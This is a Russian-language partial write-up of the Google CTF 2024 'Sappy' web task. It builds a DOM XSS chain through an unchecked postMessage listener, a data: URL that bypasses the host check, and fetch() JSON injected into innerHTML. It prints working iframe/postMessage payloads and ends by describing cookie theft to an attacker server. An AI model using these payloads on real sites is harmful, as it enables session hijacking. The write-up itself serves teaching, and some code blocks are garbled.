XSS в Sappy (частичный writeup)24.06.2024 21:00

Введение

Недавно прошел Google CTF, после которого были выложены исходные коды и exploit’ы к заданиям.

В этой статье я хотел бы подробнее рассмотреть web task с недавно прошедшего Google CTF, который называется «Sappy».

На момент решения задания, участника выдавался ограниченный исходный код задачи.

На данный момент полный исходный код проекта доступен в GitHub репозитории. Сейчас можно сказать, что была доступна директория challenge.

Анализ кода

Прежде, чем начать, введем основные определения.

Осваиваем DOM Invader: ищем DOM XSS и Prototype Pollution на примере пяти лабораторных и одной уязвимости на Хабре

Source
Свойство JavaScript, которое принимает данные, потенциально контролируемые пользователем. Пример источника — свойство location.search, поскольку оно считывает ввод из строки запроса, которой относительно просто управлять. В конечном итоге любое свойство, которым может управлять пользователь, является потенциальным Source. К этому относятся URL-адрес источника (document.referrer), Cookie пользователя (document.cookie) и WebMessages (подробнее про WebMessages написано здесь).
Sink
Потенциально опасная функция JavaScript или объект DOM, которые могут вызвать уязвимость, если в них передаются данные, контролируемые пользователем. Например, функция eval () является Sink’ом, поскольку она обрабатывает аргумент, который в него передается, как JavaScript. Примером HTML-Sink является document.body.innerHTML, так как это потенциально позволяет внедрить HTML и выполнить произвольный JavaScript.
Gadget
Небольшие фрагменты кода, которые могут быть использованы для эксплуатации уязвимостей. «Гаджеты» часто применяются в цепочках уязвимостей для достижения более значительного импакта. Еще их используют для обхода защитных мер, повышения привилегий или выполнения произвольного кода.

После знакомства с исходным кодом нас должен был заинтересовать файл sap.html, который подтягивает файл sap.js.

Потенциальный sink находится в данном участке кода:

window.addEventListener(
	"message",
	async (event) => {
		let data = event.data;
		if (typeof data !== "string") return;
		data = JSON.parse(data);
		const method = data.method;
		switch (method) {
			case "initialize": {
				if (!data.host) return;
				API.host = data.host;
				break;
			}
		case "render": {
			if (typeof data.page !== "string") return;
			const url = buildUrl({
				host: API.host,
				page: data.page,
			});
			const resp = await fetch(url);
			if (resp.status !== 200) {
				console.error("something went wrong");
				return;
			}
			const json = await resp.json();
			if (typeof json.html === "string") {
				output.innerHTML = json.html;
			}
			break;
			}
		}
	},
	false
);

Sink:

output.innerHTML = json.html;

Цепочка гаджетов:

Передача пользовательских данных в event listener
Переопределение API.host
Формирование параметра url с использованием API.host и data.page
AJAX запрос на url с использованием fetch()
Ответ запроса в формате json содержит ключ html, значение которого подставляется в sink

Подготовка exploit’а

Передача пользовательских данных в event listener

Чтобы проэксплуатировать данный участок кода, необходимо как-то передать в него пользовательские данные (source). Для этого используется метод addEventListener()

MDN:

Метод EventTarget.addEventListener() регистрирует определённый обработчик события, вызванного на EventTarget.
EventTarget может быть Element, Document, Window, или любым другим объектом, поддерживающим события (таким как XMLHttpRequest).
Синтаксис
target.addEventListener(type, listener[, options]); ...
type
Чувствительная к регистру строка, представляющая тип обрабатываемого события.
listener
Объект, который принимает уведомление, когда событие указанного типа произошло. Это должен быть объект, реализующий интерфейс EventListener или просто функция JavaScript.

Controlling the web message source (дословный перевод)

Если страница обрабатывает входящие веб-сообщения небезопасным способом, например, не проверяя корректно origin входящих сообщений в event listener, свойства и функции, вызываемые event listener’ом, могут стать sink’ами. Например, злоумышленник может разместить вредоносный iframe и использовать метод postMessage() для передачи данных веб-сообщения уязвимому event listener, который затем отправляет полезную нагрузку в sink на родительской странице. Такое поведение означает, что вы можете использовать веб-сообщения в качестве source для распространения вредоносных данных в любой из этих sink’ов.

Т.е. для выполнения метода postMessage() в нашем exploit’е необходимо выполнение следующих условий:

Наличие event listener’а типа «message» на атакуемом приложении
```
addEventListener("message", ...)
```

Использование данных из event’а

addEventListener("message", funciton(event) {
	eval(event.data);
})

Отсутствие защитных мер от использования iframe’ов

Тогда наш exploit на данном этапе (гаджете) может выглядеть примерно так:

</code></pre>

<h4>Переопределение API.host</h4>

<pre><code class="javascript">	async (event) => {
		let data = event.data;
		if (typeof data !== "string") return;
		data = JSON.parse(data);
		const method = data.method;
		switch (method) {
			case "initialize": {
				if (!data.host) return;
  					API.host = data.host;
  					break;
			}</code></pre>

<p>Чтобы переопределить <code>API.host</code>, необходимо, чтобы source был в&nbsp;формате JSON и&nbsp;содержал ключи <code>method</code> со&nbsp;значением <code>"initialize"</code> и&nbsp;<code>host</code> с&nbsp;произвольным значением: </p>

<p>Тогда exploit на&nbsp;данном этапе может выглядеть подобным образом: </p>

<pre><code class="xml"><iframe width="648" height="365" src="https://sappy-web.2024.ctfcompetition.com/sap.html" onload='this.contentWindow.postMessage("{\"method\":\"initialize\",\"host\":\"...\"}","*")'></code></pre>

<h4>Формирование параметра url с&nbsp;использованием API.host и&nbsp;data.page</h4>

<pre><code class="json">const Uri = goog.require("goog.Uri");
...
		case "render": {
			if (typeof data.page !== "string") return;
			const url = buildUrl({
				host: API.host,
				page: data.page,
			});
		}

...
function buildUrl(options) {
	return getHost(options) + "/sap/" + options.page;
}
...

function getHost(options) {
if (!options.host) {
	const u = Uri.parse(document.location);
	return u.scheme + "://sappy-web.2024.ctfcompetition.com";
}
	return validate(options.host);
}</code></pre>

<p>Как&nbsp;видно из&nbsp;кода параметр <code>API.host</code> проверяется на&nbsp;наличие строки <code>"://sappy-web.2024.ctfcompetition.com"</code>, но&nbsp;без&nbsp;проверки схемы. </p>

<p>Тут мы знакомимся со&nbsp;схемой data.</p>

<h3>Схема DATA:, </h3>

<p>С&nbsp;общим описанием схемы можно ознакомиться из&nbsp;RFC.</p>

<p>RFC: </p>

<pre><code>   Some applications that use URLs also have a need to embed (small)
   media type data directly inline. This document defines a new URL
   scheme that would work like 'immediate addressing'. The URLs are of
   the form:

                    data:[<mediatype>][;base64],<data>

   The <mediatype> is an Internet media type specification (with
   optional parameters.) The appearance of ";base64" means that the data
   is encoded as base64. Without ";base64", the data (as a sequence of
   octets) is represented using ASCII encoding for octets inside the
   range of safe URL characters and using the standard %xx hex encoding
   of URLs for octets outside that range.  If <mediatype> is omitted, it
   defaults to text/plain;charset=US-ASCII.  As a shorthand,
   "text/plain" can be omitted but the charset parameter supplied.</code></pre>

<pre><code>   A data URL might be used for arbitrary types of data. The URL

                          data:,A%20brief%20note

   encodes the text/plain string "A brief note", which might be useful
   in a footnote link.
</code></pre>

<p>Нас интересует следующая информация</p>

<p>Wiki: </p>

<blockquote><p>The minimal data URI is <code>data:,</code>, consisting of the scheme, no media-type, and zero-length data.</p><p>Thus, within the overall URI syntax, a data URI consists of a <strong>scheme</strong> and a <strong>path</strong>, with no <strong>authority</strong> part,  <strong>query string</strong>, or <strong>fragment</strong>. The optional <strong>media type</strong>, the optional <strong>base64</strong> indicator, and the data are all parts of the URI path.</p></blockquote>

<p>Из&nbsp;всего выше-описанного делаем вывод, что&nbsp;для&nbsp;использования данной схемы достаточно указать <code>data:{что угодно},{полезные данные}</code>.</p>

<p>Тогда payload для&nbsp;данного гаджета будет иметь вид: </p>

<pre><code class="javascript">data://sappy-web.2024.ctfcompetition.com/,{payload}</code></pre>

<p>А&nbsp;exploit будет иметь вид: </p>

<pre><code class="xml"><iframe width="648" height="365" src="https://sappy-web.2024.ctfcompetition.com/sap.html" onload='this.contentWindow.postMessage("{\"method\":\"initialize\",\"host\":\"data://sappy-web.2024.ctfcompetition.com/,{payload}\"}","*")'></code></pre>

<h4>AJAX запрос на&nbsp;url с&nbsp;использованием fetch ()</h4>

<p>Далее надо&nbsp;знать некоторые особенности работы с&nbsp;fetch и&nbsp;promise.</p>

<h3>Promise</h3>

<p>Современный учебник JavaScript: </p>

<blockquote><p>Promise&nbsp;&mdash; это специальный объект, который содержит своё состояние. Вначале <code>pending</code>(«ожидание»), затем&nbsp;&mdash; одно из:  <code>fulfilled</code> («выполнено успешно») или&nbsp;<code>rejected</code> («выполнено с&nbsp;ошибкой»).<br />…<br />Способ использования, в&nbsp;общих чертах, такой: </p><ol><li><p>Код, которому надо&nbsp;сделать что-то&nbsp;асинхронно, создаёт объект <code>promise</code> и&nbsp;возвращает его.</p></li><li><p>Внешний код, получив <code>promise</code>, навешивает на&nbsp;него обработчики.</p></li><li><p>По&nbsp;завершении процесса асинхронный код переводит <code>promise</code> в&nbsp;состояние <code>fulfilled</code> (с&nbsp;результатом) или&nbsp;<code>rejected</code> (с&nbsp;ошибкой). При&nbsp;этом автоматически вызываются соответствующие обработчики во&nbsp;внешнем коде.</p></li></ol></blockquote>

<h3>fetch ()</h3>

<p>MDN: </p>

<blockquote><p>The global <code>fetch()</code> method starts the process of fetching a resource from the network, returning a promise that is fulfilled once the response is available.</p></blockquote>

<p>(дословный перевод):»<em>Глобальный метод </em><code>fetch()</code><em> запускает процесс получения ресурса из&nbsp;сети, возвращая promise, который будет выполнен (состояние </em><code>fulfilled</code><em>), как&nbsp;только ответ (Response) будет доступен</em>.»</p>

<blockquote><p>The promise resolves to the <code>Response</code> object representing the response to your request.</p></blockquote>

<p>(дословный перевод):»<em>Promise резолвится в&nbsp;объект </em><code>Response</code><em>, представляющий ответ на&nbsp;ваш запрос.</em>»</p>

<blockquote><p>A <code>fetch()</code> promise only rejects when the request fails, for example, because of a badly-formed request URL or a network error. A <code>fetch()</code> promise <em>does not</em> reject if the server responds with HTTP status codes that indicate errors (<code>404</code>, <code>504</code>, etc.). Instead, a <code>then()</code> handler must check the <code>Response.ok</code> and/or <code>Response.status</code> properties.</p></blockquote>

<p>(дословный перевод):»<em>Promise </em><code>fetch()</code><em> отклоняется только в&nbsp;том случае, если запрос не&nbsp;выполняется, например, из-за&nbsp;неправильно сформированного URL-адреса запроса или&nbsp;сетевой ошибки. Promise </em><code>fetch()</code><em> не&nbsp;отклоняет запрос, если сервер отвечает кодами состояния HTTP, которые указывают на&nbsp;ошибки (</em><code>404</code><em>, </em><code>504</code><em> и&nbsp;т. д.). Вместо этого обработчик </em><code>then()</code><em> должен проверить свойства </em><code>Response.ok</code><em> и/или&nbsp;</em><code>Response.status</code><em>.</em>»</p>

<p>Для&nbsp;нас важно, что&nbsp;при&nbsp;любом ответе сервера, <code>fetch()</code> все равно вернет promise с&nbsp;ответом, но&nbsp;об&nbsp;этом чуть позже.</p>

<p>Когда вы вызываете <code>fetch</code>, он возвращает promise, которое резвится в&nbsp;объект ответа (Response). Чтобы получить доступ к&nbsp;полям объекта ответа, нужно дождаться resolve этого promise’а. </p>

<p>Это можно сделать несколькими способами: используя цепочки промисов (<code>.then()</code>) или&nbsp;используя <code>await</code>внутри асинхронной функции.</p>

<p><strong>Пример без&nbsp;</strong><code>await</code>: </p>

<pre><code class="javascript">fetch("https://example.com/api/data")
  .then(response => {
    // Теперь у вас есть объект Response
    console.log(response.status); // Пример доступа к полю статуса
    return response.text(); // Если вы ожидаете текстовый ответ
  })</code></pre>

<p><code>await fetch()</code> используется внутри асинхронной функции для&nbsp;ожидания разрешения promise’а, который возвращает <code>fetch()</code>. Это упрощает работу с&nbsp;асинхронными операциями, так как&nbsp;позволяет писать код, который выглядит синхронно.</p>

<p><strong>Пример с&nbsp;</strong><code>await</code>: </p>

<pre><code class="javascript">async function fetchData() { 
  const response = await fetch('https://example.com/api/data'); 
  const data = await response.json(); 
  console.log(data); 
} 
fetchData();</code></pre>

<p>На&nbsp;данном этапе event listener’у&nbsp;нужно отправить уже два event’а.</p>

<pre><code class="xml"><iframe id="myIframe" src="https://sappy-web.2024.ctfcompetition.com/sap.html" onload=sendMessages()>

Примечание. Здесь я перенес основной payload в значение ключа "page" для удобства.

Ответ запроса в формате json содержит ключ html, значение которого подставляется в sink

const json = await resp.json();
if (typeof json.html === "string") {
	output.innerHTML = json.html;
}

Если мы используем метод fetch() для запроса ресурса в формате json, то после получения ответа сервера можно использовать метод Response.json().

Есть ресурс для тестирования подобного функционала: https://mdn.github.io/dom-examples/fetch/fetch-json/.

Адрес https://mdn.github.io/dom-examples/fetch/fetch-json/products.json возвращает массив JSON объектов.

Примечание 1. В аргументе fetch() указан относительный адрес, т.к. запрос выполнялся в консоли панели инструментов конкретного ресурса.

Примечание 2. Метод json() так же возвращает promise, поэтому используем await для получения объекта.

Теперь используем схему data:,{payload} с json данными в качестве payload’а {"foo":"bar"} в URI и метод json():

И мы видим, что данные из url вернулись в виде JSON объекта из ответа.

Получается, что код вида:

res = await fetch(url);
foo = await res.json();

позволяет нам создавать различные json объекты в рамках одного и того же домена, используя схему data:, и promise’ы метода fetch().

Помним, что url формируется конкатенацией двух source со строковым значением "/sap/":

function buildUrl(options) {
	return getHost(options) + "/sap/" + options.page;
}

Чтобы payload имел вид типа:

'data://sappy-web.2024.ctfcompetition.com/sap,{"html":""}'

Тогда конечный exploit будет выглядеть примерно следующим образом:





    
    
    Document

На момент написания writeup’а exploit от Google выглядит следующим образом:

window.postMessage('{"method": "initialize","host": "data://sappy-web.2024.ctfcompetition.com/,{\\"html\\":\\""}');
window.postMessage('{"method": "render", "page": "page1\\"}"}')

В завершении, чтобы получить флаг, нужно было изменить exploit таким образом, чтобы xss отправляла cookie жертвы на подконтрольный нам ресурс.

Далее сохранить этот exploit на подконтрольном ресурсе, передать url данного ресурса в поле URL блока «Share your learnings»:

Если все сделать верно, то вместе с cookie будет добыт флаг.